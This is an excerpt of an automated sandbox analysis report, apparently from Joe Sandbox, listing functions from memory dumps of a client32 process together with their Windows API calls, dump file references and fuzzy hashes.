Download Yara Rule

APIs

Part of subcall function 111659CF: __getptd_noexit.LIBCMT ref: 111659CF

__lock_file.LIBCMT ref: 1116048C

Part of subcall function 11167679: __lock.LIBCMT ref: 1116769E

__fclose_nolock.LIBCMT ref: 11160497

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 2aad6af1853873c0d6f3ae2b438c67c3a00a140ac949046a066bb16936e6fd01
Instruction ID: 3c6ac871110638f17016a6292385eeeb86b4e8c95666fa946b80bcf511f614e0
Opcode Fuzzy Hash: 2aad6af1853873c0d6f3ae2b438c67c3a00a140ac949046a066bb16936e6fd01
Instruction Fuzzy Hash: 88F0B435905B079AD7209F79980079EFBB86F0133CF118A48C474AA0D0DBFEAA21CB56

Function 6C3D6C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 6C3D6C26
Sleep.KERNEL32(00000064), ref: 6C3D6C5B

Part of subcall function 6C3D6940: GetTickCount.KERNEL32 ref: 6C3D6950

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$Sleep
String ID:
API String ID: 4250438611-0
Opcode ID: 80ef1c9547855fbc7060cbb05d439d8f87f7a71afc21cb05993b950496508368
Instruction ID: 2a15451f4589804fce825434008fd5c575e5a5adabda7365b440588bb30fd2d7
Opcode Fuzzy Hash: 80ef1c9547855fbc7060cbb05d439d8f87f7a71afc21cb05993b950496508368
Instruction Fuzzy Hash: 86F03A32780204CBCE14FFB5A656758B2B5EB52359F12042EC822D6E90C7B96884DF13

Function 6C3C63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 6C3C63A9
Sleep.KERNEL32(00000032), ref: 6C3C63B3

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: 05bd185c31f7c098f315fcc0b14d86769db3e9f336d5a680028c002c5bf0b369
Instruction ID: b94f7361655c697c1c4ebcfdfd38c787b721ae5faac10b064b3c5ecc2908c6c9
Opcode Fuzzy Hash: 05bd185c31f7c098f315fcc0b14d86769db3e9f336d5a680028c002c5bf0b369
Instruction Fuzzy Hash: 95B0927039216049AB0127710A062AE20F80FC924BF6004682AA2C8996EF65C504A923

Function 11141240 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(7693795C,?,00000104,7693795C), ref: 11141187

Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688

GetLastError.KERNEL32(?,00000000,7693795C,00000000), ref: 11141275
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,7693795C,00000000), ref: 11141285

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
String ID:
API String ID: 3768737497-0
Opcode ID: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
Instruction ID: 103134ba4653f8fc15402f07188d85fc6b934bc741d6c344a8ba55e5f3ec2e88
Opcode Fuzzy Hash: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
Instruction Fuzzy Hash: 1A11E5B6A00215ABDB119F94C9C0E6FF378EB45A69F304165ED04D7200E775BD0287A3

Function 110105D0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 11010684

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID:
API String ID: 3382485803-0
Opcode ID: 8f0d228a3e67031c3c74e055096ec6fe36c0135427f2f7eb65bb086bb99789bd
Instruction ID: 37a4efda2de7bef0abd3e107bc03fb4b477421a9c8ed2a8831dce733ffd1d250
Opcode Fuzzy Hash: 8f0d228a3e67031c3c74e055096ec6fe36c0135427f2f7eb65bb086bb99789bd
Instruction Fuzzy Hash: A5517E74A00245DFDB04CF98C980AADFBF5BF89318F24869DD5599B385C736E902CB90

Function 1113F3A0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,76938400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction ID: 5fbfdb2e62506a22be8d6102f6026bab3dbcb22e3eaadfb442edbe5e81d15758
Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
Instruction Fuzzy Hash: C711B4717242475BE7118D14E590AAEFB6AEFC523EF20812AE59647908C2319443C763

Function 110F86A0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110F86CD

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 60feac90d17ce4ea0d07673dd70e68ce323b270b37787058afa517d2a174fb0b
Instruction ID: 5d7275223ac790c55298ab4dac0b89e6422b5a9cd2a22daee5b7bffea7f2d82d
Opcode Fuzzy Hash: 60feac90d17ce4ea0d07673dd70e68ce323b270b37787058afa517d2a174fb0b
Instruction Fuzzy Hash: E511AC71E0122D9FDB51CFA8DC917EEB3F8DB49304F0040D9E9099B240EA716E448B91

Function 1116C813 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,11030A6F,00000000,?,111664B4,?,11030A6F,00000000,00000000,00000000,?,11167E47,00000001,00000214,?,1110C53E), ref: 1116C856

Part of subcall function 111659CF: __getptd_noexit.LIBCMT ref: 111659CF

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 64e617296fa02f76875e2267f2f80c296e1da2c101056d497844d3fedd062177
Instruction ID: 00b7d569cdde8c65b18fb77c1b34b3d821c09f66d996ae1b2300b2679a5b44d5
Opcode Fuzzy Hash: 64e617296fa02f76875e2267f2f80c296e1da2c101056d497844d3fedd062177
Instruction Fuzzy Hash: 0101D835B022169BEB258F69CD44B97F75CBB81774F018529E826CA190E7B5D420C740

Function 6C3EA082 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6C3E6F16,00000000,?,6C3ED40B,00000001,6C3E6F16,00000000,00000000,00000000,?,6C3E6F16,00000001,00000214), ref: 6C3EA0C5

Part of subcall function 6C3E60F9: __getptd_noexit.LIBCMT ref: 6C3E60F9

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: a300025475ca47a5198c68cd79f5169da5d727b4111cfe0bd39613684706f8e4
Instruction ID: 1623b4b175966267f3bfb9d62522cf1bc841ef6da4e92c7c4c4973ec8cc8b830
Opcode Fuzzy Hash: a300025475ca47a5198c68cd79f5169da5d727b4111cfe0bd39613684706f8e4
Instruction Fuzzy Hash: 3301B5313052359EEB159F26CC54B973BB8AB89368F10462BE816DB980DB7698008F90

Function 6C3D7D00 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

__vswprintf.LIBCMT ref: 6C3D7D26

Memory Dump Source

Source File: 00000004.00000002.4575810367.000000006C3C1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C3C0000, based on PE: true

Associated: 00000004.00000002.4575794801.000000006C3C0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575839994.000000006C400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575856135.000000006C409000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575870135.000000006C40E000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000004.00000002.4575904976.000000006C410000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c3c0000_client32.jbxd

Yara matches

Similarity

API ID: __vswprintf
String ID:
API String ID: 597827344-0
Opcode ID: 229d2802eca876e79b04183f414fd2783e442a6118e0ede60542279c4818dc88
Instruction ID: d279c55f154710c71975e22835d90e878a4e1789afdf5bdb2ddb61280b31741d
Opcode Fuzzy Hash: 229d2802eca876e79b04183f414fd2783e442a6118e0ede60542279c4818dc88
Instruction Fuzzy Hash: 9FE0C0B690111CABCB00EF54DD41DEE73BCAF49204F41459AAA0557641DB31AE1A8B96

Function 111639C3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

__waccess_s.LIBCMT ref: 111639CE

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __waccess_s
String ID:
API String ID: 4272103461-0
Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction ID: 95a5e058e09bcf8e7623232769a0b42c4f024ae326205fc4421f838046d8c4cc
Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
Instruction Fuzzy Hash: 8BC09B3705810D7F5F055DE5EC00C557F5DD6807787144115F91C89491DD73E561D944

Function 1116067B Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 11160688

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: 517f4e7488fa791e0cd8e65386a1f1fc6d78c1b53c40f77729b33bd043c5d072
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: D3C09B7644020C77CF111952DC11E457F2D97C0664F044010FB1C1D1609773F571D685

Function 00401000 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

_NSMClient32@8.PCICL32(?,?,004010A8,00000000), ref: 0040100A

Memory Dump Source

Source File: 00000004.00000002.4573461391.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.4573447156.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.4573475781.0000000000403000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.4573529074.0000000000404000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_client32.jbxd

Similarity

API ID: Client32@8
String ID:
API String ID: 433899448-0
Opcode ID: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction ID: 101b8ead0f36abaf2e4a9e5d6dc85a2691bea7164fd7fac6f3abc260b8d29af7
Opcode Fuzzy Hash: a50aadacad94cde84f5700121068934964b21678fd47baf16d7368d0ca4f48de
Instruction Fuzzy Hash: 85B012B91043406FC104DB10C880D2B73A8BBC4300F008D0DB4D142181C734D800C632

Function 6C611E1C Relevance: 1.3, APIs: 1, Instructions: 32sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6C6109A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6C611E32,00000001,?,00000000,00000000,00000000,?,6C6375BC,00000001,00000214), ref: 6C6109E8

Sleep.KERNEL32(00000000), ref: 6C63F1D1

Memory Dump Source

Source File: 00000004.00000002.4575938208.000000006C601000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000004.00000002.4575920772.000000006C600000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576103842.000000006C6B4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576121278.000000006C6B6000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.4576247728.000000006C6B9000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c600000_client32.jbxd

Similarity

API ID: AllocateHeapSleep
String ID:
API String ID: 4201116106-0
Opcode ID: f99f3a8713a62c1e4af2690937af929f10b382a8d10c9803208cd4a20983a382
Instruction ID: 3e47d0a1a0c4de1dccacd2fc32916c38f43a767ff07d4469cdf3f28a662902e6
Opcode Fuzzy Hash: f99f3a8713a62c1e4af2690937af929f10b382a8d10c9803208cd4a20983a382
Instruction Fuzzy Hash: C0F0AE319041155BCB5055BED9506863A669BC2379F100722F57CC3D90D731D517819E

Non-executed Functions

Function 1102D1B3 Relevance: 38.8, APIs: 14, Strings: 8, Instructions: 268COMMON

Download Yara Rule

APIs

Part of subcall function 1110CD20: DeleteCriticalSection.KERNEL32(76937AB0,33E68B52,?,76937AA0,00000000,?,00000000,1117DED8,000000FF,?,110BFC0D), ref: 1110CD6A
Part of subcall function 1110CD20: EnterCriticalSection.KERNEL32 ref: 1110CDB5
Part of subcall function 1110CD20: SetEvent.KERNEL32(00000268), ref: 1110CDDE
Part of subcall function 1110CD20: CloseHandle.KERNEL32(00000268), ref: 1110CE12
Part of subcall function 1110CD20: WaitForSingleObject.KERNEL32(0000028C,000000FF), ref: 1110CE20
Part of subcall function 1110CD20: CloseHandle.KERNEL32(0000028C), ref: 1110CE2D

CloseHandle.KERNEL32(00000288), ref: 1102D275
_free.LIBCMT ref: 1102D285
_free.LIBCMT ref: 1102D2A1
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D334
GetFileAttributesA.KERNEL32(?), ref: 1102D341

Part of subcall function 1110CD20: LeaveCriticalSection.KERNEL32(111EB8A0), ref: 1110CE6E

Strings

CLIENT32.CPP, xrefs: 1102D3BF
Finished terminate, xrefs: 1102D546
